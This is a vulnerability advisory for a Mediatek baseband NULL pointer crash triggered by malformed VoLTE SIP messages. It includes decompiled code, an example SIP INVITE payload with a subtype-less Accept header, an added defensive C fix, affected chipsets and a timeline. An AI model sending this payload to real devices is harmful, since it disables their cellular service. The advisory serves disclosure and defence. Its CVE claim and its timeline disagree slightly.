An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.
The impact is a denial of service (DoS) in the baseband, triggered by a malformed VoLTE message such as a SIP INVITE or MESSAGE request.
The vulnerability described in this advisory affects a wide range of Mediatek devices. It has been assigned CVE-2025-20725.
Vulnerability Details
The crash is a NULL pointer access. sip_msg_content_type_compatible assumes every content type carries a subtype (e.g. text/plain), but inet_msg_unpack_content_type also accepts a content type without a subtype (e.g. text), so the subtype pointer handed to the comparison is NULL.
bool sip_msg_content_type_compatible(char **accept, char **contentType)
{
    int iVar1;
    char *pcVar2;
    char *pcVar3;

    // accept[0]/contentType[0] are the main types, accept[1]/contentType[1]
    // the subtypes; inet_msg_unpack_content_type leaves [1] NULL when the
    // header carries no subtype.
    iVar1 = voip_strcasecmp(accept[0], "*");
    pcVar3 = "*";
    // If the Accept is in format */something, accept anything, if the Accept is exactly */*
    if (iVar1 != 0) {
        // Here we know that main_content_type is specific in the Accept header
        iVar1 = voip_strcasecmp(contentType[0], "*");
        if (iVar1 == 0) {
            // ??? wildcard in Content-Type is invalid
            pcVar2 = contentType[1];
            pcVar3 = "*";
            return voip_strcasecmp(accept[1], pcVar3);
        }
        // no wildcards in main content type
        iVar1 = voip_strcasecmp(*accept, *contentType);
        if (iVar1 != 0) {
            // mismatch in main content type
            return false;
        }
        iVar1 = voip_strcasecmp(accept[1], "*");
        if ((iVar1 == 0) || (iVar1 = voip_strcasecmp(contentType[1], "*"), iVar1 == 0)) {
            // wildcard specified either in Accept (or Content-Type???)
            return true;
        }
        pcVar3 = contentType[1];
    }
    pcVar2 = accept[1];
LAB_90ba05dc:
    // A NULL subtype pointer reaches voip_strcasecmp here (and in the "*"
    // checks above); this is the NULL access that crashes the baseband.
    iVar1 = voip_strcasecmp(pcVar2, pcVar3);
    return iVar1 == 0;
}
Example payload
INVITE sip:2 SIP/2.0
Accept: application
From: <sip:1>;tag=ttecbsI
To: <sip:2>
CSeq: 1 INVITE
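As an added example (not Mediatek's code, and not part of the original advisory), the following C shows the defensive shape the advisory implies: a media-type parser that, like inet_msg_unpack_content_type, tolerates a bare main type such as the payload's "Accept: application", but records the missing subtype explicitly so the compatibility check can branch on it instead of dereferencing a NULL pointer. All names (media_type_t, parse_media_type, media_type_compatible, sip_accept_allows) and the "missing subtype behaves like a wildcard" policy are assumptions made for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strcasecmp (POSIX) */

/* Parsed media type. Names and layout are assumptions for this example.
 * has_subtype is false when the header carried a bare main type such as
 * "Accept: application", the shape in the advisory's payload. */
typedef struct {
    char type[32];
    char subtype[32];
    bool has_subtype;
} media_type_t;

/* Split "type/subtype" (optionally followed by ";params") into its parts.
 * A bare "type" is accepted, like the baseband's unpack routine, but the
 * missing subtype is recorded explicitly instead of being left as a NULL
 * pointer for the caller to trip over. Returns false on an empty or
 * oversized token. */
bool parse_media_type(const char *s, media_type_t *out)
{
    memset(out, 0, sizeof *out);
    while (*s == ' ' || *s == '\t')
        s++;
    size_t n = strcspn(s, "/; \t\r\n");
    if (n == 0 || n >= sizeof out->type)
        return false;
    memcpy(out->type, s, n);
    s += n;
    if (*s != '/')
        return true;                     /* main type only */
    s++;
    size_t m = strcspn(s, "; \t\r\n");
    if (m == 0 || m >= sizeof out->subtype)
        return false;
    memcpy(out->subtype, s, m);
    out->has_subtype = true;
    return true;
}

/* Compatibility check that never dereferences a missing subtype.
 * Policy chosen here (an assumption): a missing subtype behaves like the
 * wildcard "*", so "Accept: application" matches any application/... body. */
bool media_type_compatible(const media_type_t *accept, const media_type_t *ct)
{
    if (strcasecmp(accept->type, "*") != 0 &&
        strcasecmp(accept->type, ct->type) != 0)
        return false;                    /* main types differ */
    if (!accept->has_subtype || !ct->has_subtype)
        return true;                     /* treated as type/* */
    if (strcasecmp(accept->subtype, "*") == 0 ||
        strcasecmp(ct->subtype, "*") == 0)
        return true;
    return strcasecmp(accept->subtype, ct->subtype) == 0;
}

/* Convenience wrapper over raw header values: unparsable input is
 * rejected rather than being passed on as a half-initialised structure. */
bool sip_accept_allows(const char *accept_hdr, const char *content_type_hdr)
{
    media_type_t a, c;
    if (!parse_media_type(accept_hdr, &a) || !parse_media_type(content_type_hdr, &c))
        return false;
    return media_type_compatible(&a, &c);
}

int main(void)
{
    /* Constructed inputs: the advisory's "Accept: application" header
     * against a typical INVITE body type. The original code would reach a
     * NULL subtype pointer here; this version simply answers the question. */
    printf("application vs application/sdp: %d\n",
           sip_accept_allows("application", "application/sdp"));
    printf("application vs text/plain:      %d\n",
           sip_accept_allows("application", "text/plain"));
    printf("*/* vs text (no subtype):       %d\n",
           sip_accept_allows("*/*", "text"));
    return 0;
}
```

The design point is that the parser and the consumer share one invariant: whatever the parser is willing to accept, the comparison must be able to handle. Whether a bare main type should be treated as a wildcard or rejected outright is a policy choice; either is fine as long as it is made in one place and the comparison never assumes a pointer the parser may not have filled in.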
Affected Devices
Includes most, possibly all, of the following devices:
MT6739, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6771, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8667, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893
Timeline
- 2025.06.23. Bug reported to Mediatek PSIRT
- 2025.07.23. Mediatek confirms vulnerability, does not assign CVE due to low severity
- 2025.10.01. Advisory release